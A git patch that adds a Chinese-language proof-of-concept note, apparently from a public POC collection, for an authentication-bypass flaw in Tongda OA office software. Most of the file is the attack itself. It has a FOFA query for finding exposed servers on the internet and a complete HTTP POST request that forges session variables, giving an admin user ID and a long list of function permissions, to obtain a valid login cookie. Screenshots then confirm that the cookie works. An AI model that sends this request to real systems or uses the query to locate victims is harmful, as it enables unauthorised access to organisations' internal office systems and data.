From 0c51e51dfb8442cc9889a236aecc624a78079e01 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Tue, 12 Dec 2023 20:07:17 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E9=80=9A=E8=BE=BEOA=20header=E8=BA=AB?=
 =?UTF-8?q?=E4=BB=BD=E8=AE=A4=E8=AF=81=E7=BB=95=E8=BF=87=E6=BC=8F=E6=B4=9E?=
 =?UTF-8?q?.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 通达OA header身份认证绕过漏洞.md | 29 +++++++++++++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 通达OA header身份认证绕过漏洞.md

diff --git a/通达OA header身份认证绕过漏洞.md b/通达OA header身份认证绕过漏洞.md
new file mode 100644
index 0000000..96550e3
--- /dev/null
+++ b/通达OA header身份认证绕过漏洞.md	
@@ -0,0 +1,29 @@
+## 通达OA header身份认证绕过漏洞
+通达OA（Office Anywhere网络智能办公系统）是中国通达公司的一套协同办公自动化软件，通达OA2013，通达OA2016，通达OA2017 存在身份认证绕过漏洞，攻击者通过构造特定的数据包，获取登录cookie，利用cookie进行未授权访问。
+
+## fofa
+```
+title="office Anywhere"
+```
+
+
+## poc
+```
+POST /module/retrieve_pwd/header.inc.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 1024
+
+_SESSION[LOGIN_THEME]=15&_SESSION[LOGIN_USER_ID]=1&_SESSION[LOGIN_UID]=1&_SESSION[LOGIN_FUNC_STR]=1,3,42,643,644,634,4,147,148,7,8,9,10,16,11,130,5,131,132,256,229,182,183,194,637,134,37,135,136,226,253,254,255,536,24,196,105,119,80,96,97,98,114,126,179,607,539,251,127,238,128,85,86,87,88,89,137,138,222,90,91,92,152,93,94,95,118,237,108,109,110,112,51,53,54,153,217,150,239,240,218,219,43,17,18,19,15,36,70,76,77,115,116,185,235,535,59,133,64,257,2,74,12,68,66,67,13,14,40,41,44,75,27,60,61,481,482,483,484,485,486,487,488,489,490,491,492,120,494,495,496,497,498,499,500,501,502,503,505,504,26,506,507,508,515,537,122,123,124,628,125,630,631,632,633,55,514,509,29,28,129,510,511,224,39,512,513,252,230,231,232,629,233,234,461,462,463,464,465,466,467,468,469,470,471,472,473,474,475,200,202,201,203,204,205,206,207,208,209,65,187,186,188,189,190,191,606,192,193,221,550,551,73,62,63,34,532,548,640,641,642,549,601,600,602,603,604,46,21,22,227,56,30,31,33,32,605,57,609,103,146,107,197,228,58,538,151,6,534,69,71,72,223,639,
+
+```
+![image](https://github.com/wy876/POC/assets/139549762/b5cf4a04-f5e9-47d5-b463-528fac5133c0)
+
+第二步：验证cookie是否有效
+![image](https://github.com/wy876/POC/assets/139549762/161f8b28-059c-4132-b9b7-8435dd124e14)
+
+![image](https://github.com/wy876/POC/assets/139549762/f44e5dc2-2a95-4900-9f71-9001ef870980)